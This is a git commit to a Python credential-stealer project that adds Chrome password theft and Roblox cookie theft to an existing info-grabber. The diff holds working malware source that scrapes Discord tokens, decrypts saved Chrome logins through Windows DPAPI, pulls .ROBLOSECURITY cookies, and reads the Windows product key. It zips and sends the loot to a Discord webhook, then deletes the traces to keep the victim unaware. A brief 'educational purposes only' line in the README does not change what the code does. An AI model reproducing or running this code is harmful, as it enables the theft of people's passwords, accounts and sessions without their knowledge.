Added chromepassword stealer and roblox security stealer cuz bored

Napoleon-x · Napoleon-x · commit b8de06b42090 · 2021-05-01T15:11:49.000+01:00
diff --git a/README.md b/README.md
@@ -5,7 +5,7 @@
 ## Future plans:
 - Better settings
 - Steam Stealer
-- Logging Browser History and Passwords
+- ~~Logging Browser History and Passwords~~
 - Record Video or Take Screenshot
 - Detailed Specs
 
@@ -18,7 +18,7 @@
 3. Compile it using pyinstaller
 4. Done
 
-## Showcase:
+## Showcase (old):
 ![Showcase](https://i.imgur.com/6BAJJ7e.png)
 
 `WARN: This one is for educational purposes only! I do not recommend using it on people!`
diff --git a/main.py b/main.py
@@ -13,6 +13,19 @@
 import requests
 import subprocess
 from uuid import getnode as get_mac
+import browser_cookie3 as steal, requests, base64, random, string, zipfile, shutil, dhooks, os, re, sys, sqlite3
+from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
+from cryptography.hazmat.primitives.ciphers.aead import AESGCM
+from cryptography.hazmat.backends import default_backend
+from Crypto.Cipher import AES
+
+
+from base64 import b64decode, b64encode
+from dhooks import Webhook, Embed, File
+from subprocess import Popen, PIPE
+from json import loads, dumps
+from shutil import copyfile
+from sys import argv
 
 # CONFIG -> Setup before compiling
 url= "" #Paste Discord Webhook url
@@ -123,3 +136,255 @@ def Wipe():
 
 requests.post(url, data=json.dumps({ "embeds": [ { "title": f"Someone Runs Program! - {host}", "color": 8781568 }, { "color": 7506394, "fields": [ { "name": "GeoLocation", "value": f"Using VPN?: {proxy}\nLocal IP: {localip}\nPublic IP: {publicip}\nMAC Adress: {mac}\n\nCountry: {country} | {callcode} | {timezone}\nregion: {region}\nCity: {city} | {postal}\nCurrency: {currency}\n\n\n\n" } ] }, { "fields": [ { "name": "System Information", "value": f"System: {uname.system}\nNode: {uname.node}\nMachine: {uname.machine}\nProcessor: {uname.processor}\n\nBoot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}" } ] }, { "color": 15109662, "fields": [ { "name": "CPU Information", "value": f"Psychical cores: {psutil.cpu_count(logical=False)}\nTotal Cores: {psutil.cpu_count(logical=True)}\n\nMax Frequency: {cpufreq.max:.2f}Mhz\nMin Frequency: {cpufreq.min:.2f}Mhz\n\nTotal CPU usage: {psutil.cpu_percent()}\n" }, { "name": "Nemory Information", "value": f"Total: {scale(svmem.total)}\nAvailable: {scale(svmem.available)}\nUsed: {scale(svmem.used)}\nPercentage: {svmem.percent}%" }, { "name": "Disk Information", "value": f"Total Size: {scale(partition_usage.total)}\nUsed: {scale(partition_usage.used)}\nFree: {scale(partition_usage.free)}\nPercentage: {partition_usage.percent}%\n\nTotal read: {scale(disk_io.read_bytes)}\nTotal write: {scale(disk_io.write_bytes)}" }, { "name": "Network Information", "value": f"Total Sent: {scale(net_io.bytes_sent)}\")\nTotal Received: {scale(net_io.bytes_recv)}" } ] }, { "color": 7440378, "fields": [ { "name": "Discord information", "value": f"Token: {realshit}" } ] } ] }), headers={"Content-Type": "application/json"})
 
+DBP = r'Google\Chrome\User Data\Default\Login Data'
+ADP = os.environ['LOCALAPPDATA']
+
+
+def sniff(path):
+    path += '\\Local Storage\\leveldb'
+
+    tokens = []
+    try:
+        for file_name in os.listdir(path):
+            if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
+                continue
+
+            for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
+                for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
+                    for token in re.findall(regex, line):
+                        tokens.append(token)
+        return tokens
+    except:
+        pass
+
+
+def encrypt(cipher, plaintext, nonce):
+    cipher.mode = modes.GCM(nonce)
+    encryptor = cipher.encryptor()
+    ciphertext = encryptor.update(plaintext)
+    return (cipher, ciphertext, nonce)
+
+
+def decrypt(cipher, ciphertext, nonce):
+    cipher.mode = modes.GCM(nonce)
+    decryptor = cipher.decryptor()
+    return decryptor.update(ciphertext)
+
+
+def rcipher(key):
+    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
+    return cipher
+
+
+def dpapi(encrypted):
+    import ctypes
+    import ctypes.wintypes
+
+    class DATA_BLOB(ctypes.Structure):
+        _fields_ = [('cbData', ctypes.wintypes.DWORD),
+                    ('pbData', ctypes.POINTER(ctypes.c_char))]
+
+    p = ctypes.create_string_buffer(encrypted, len(encrypted))
+    blobin = DATA_BLOB(ctypes.sizeof(p), p)
+    blobout = DATA_BLOB()
+    retval = ctypes.windll.crypt32.CryptUnprotectData(
+        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
+    if not retval:
+        raise ctypes.WinError()
+    result = ctypes.string_at(blobout.pbData, blobout.cbData)
+    ctypes.windll.kernel32.LocalFree(blobout.pbData)
+    return result
+
+
+def localdata():
+    jsn = None
+    with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
+        jsn = json.loads(str(f.readline()))
+    return jsn["os_crypt"]["encrypted_key"]
+
+
+def decryptions(encrypted_txt):
+    encoded_key = localdata()
+    encrypted_key = base64.b64decode(encoded_key.encode())
+    encrypted_key = encrypted_key[5:]
+    key = dpapi(encrypted_key)
+    nonce = encrypted_txt[3:15]
+    cipher = rcipher(key)
+    return decrypt(cipher, encrypted_txt[15:], nonce)
+
+
+class chrome:
+    def __init__(self):
+        self.passwordList = []
+
+    def chromedb(self):
+        _full_path = os.path.join(ADP, DBP)
+        _temp_path = os.path.join(ADP, 'sqlite_file')
+        if os.path.exists(_temp_path):
+            os.remove(_temp_path)
+        shutil.copyfile(_full_path, _temp_path)
+        self.pwsd(_temp_path)
+    def pwsd(self, db_file):
+        conn = sqlite3.connect(db_file)
+        _sql = 'select signon_realm,username_value,password_value from logins'
+        for row in conn.execute(_sql):
+            host = row[0]
+            if host.startswith('android'):
+                continue
+            name = row[1]
+            value = self.cdecrypt(row[2])
+            _info = '[==================]\nhostname => : %s\nlogin => : %s\nvalue => : %s\n[==================]\n\n' % (host, name, value)
+            self.passwordList.append(_info)
+        conn.close()
+        os.remove(db_file)
+
+    def cdecrypt(self, encrypted_txt):
+        if sys.platform == 'win32':
+            try:
+                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
+                    decrypted_txt = dpapi(encrypted_txt)
+                    return decrypted_txt.decode()
+                elif encrypted_txt[:3] == b'v10':
+                    decrypted_txt = decryptions(encrypted_txt)
+                    return decrypted_txt[:-16].decode()
+            except WindowsError:
+                return None
+        else:
+            pass
+
+    def saved(self):
+        try:
+            with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
+                f.writelines(self.passwordList)
+        except WindowsError:
+            return None
+
+
+if __name__ == "__main__":
+    main = chrome()
+    try:
+        main.chromedb()
+    except:
+        pass
+    main.saved()
+
+
+# webhook functionality => collect rest of specified data, send it to our webhook
+
+
+def beamed():
+    hook = Webhook(url)
+    try:
+        hostname = requests.get("https://api.ipify.org").text
+    except:
+        pass
+
+
+    local = os.getenv('LOCALAPPDATA')
+    roaming = os.getenv('APPDATA')
+    paths = {
+        'Discord': roaming + '\\Discord',
+        'Discord Canary': roaming + '\\discordcanary',
+        'Discord PTB': roaming + '\\discordptb',
+        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
+        'Opera': roaming + '\\Opera Software\\Opera Stable',
+        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
+        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
+    }
+
+    message = '\n'
+    for platform, path in paths.items():
+        if not os.path.exists(path):
+            continue
+
+        message += '```'
+
+        tokens = sniff(path)
+
+        if len(tokens) > 0:
+            for token in tokens:
+                message += f'{token}\n'
+        else:
+            pass
+
+        message += '```'
+    
+
+    """screenshot victim's desktop"""
+    try:
+        screenshot = image.grab()
+        screenshot.save(os.getenv('ProgramData') +r'\screenshot.jpg')
+        screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
+        screenshot.close()
+    except:
+        pass
+
+    """gather our .zip variables"""
+    try:
+        zname = r'C:\ProgramData\passwords.zip'
+        newzip = zipfile.ZipFile(zname, 'w')
+        newzip.write(r'C:\ProgramData\passwords.txt')
+        newzip.close()
+        passwords = File(r'C:\ProgramData\passwords.zip')
+    except:
+        pass
+    
+    """gather our windows product key variables"""
+    try:
+        usr = os.getenv("UserName")
+        keys = subprocess.check_output('wmic path softwarelicensingservice get OA3xOriginalProductKey').decode().split('\n')[1].strip()
+        types = subprocess.check_output('wmic os get Caption').decode().split('\n')[1].strip()
+    except:
+        pass
+
+    """steal victim's .roblosecurity cookie"""
+    cookie = [".ROBLOSECURITY"]
+    cookies = []
+    limit = 2000
+
+    """chrome installation => list cookies from this location"""
+    try:
+        cookies.extend(list(steal.chrome()))
+    except:
+        pass
+
+    """firefox installation => list cookies from this location"""
+    try:
+        cookies.extend(list(steal.firefox()))
+    except:
+        pass
+
+    """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
+    try:
+        for y in cookie:
+            send = str([str(x) for x in cookies if y in str(x)])
+            chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
+            for z in chunks:
+                roblox = f'```' + f'{z}' + '```'
+    except:
+        pass
+
+    """attempt to send all recieved data to our specified webhook"""
+    try:
+        embed = Embed(title='Aditional Features',description='a victim\'s data was extracted, here\'s the details:',color=0x2f3136,timestamp='now')
+        embed.add_field("windows key:",f"user => {usr}\ntype => {types}\nkey => {keys}")
+        embed.add_field("roblosecurity:",roblox)
+        embed.add_field("tokens:",message)
+        embed.add_field("hostname:",f"{hostname}")
+    except:
+        pass
+    try:
+        hook.send(embed=embed, file=passwords)
+    except:
+        pass
+
+    """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
+    try:
+        subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
+        subprocess.os.system(r'del C:\ProgramData\passwords.zip')
+        subprocess.os.system(r'del C:\ProgramData\passwords.txt')
+    except:
+        pass
+
+
+beamed()
diff --git a/requirements.txt b/requirements.txt
@@ -1,6 +1,6 @@
-psutil
-platform
-subprocess
-uuid
-json
-socket
+dhooks==1.1.4
+requests==2.25.1
+psutil==5.8.0
+browser_cookie3==0.12.0
+cryptography==3.4.7
+pycryptodome==3.10.1
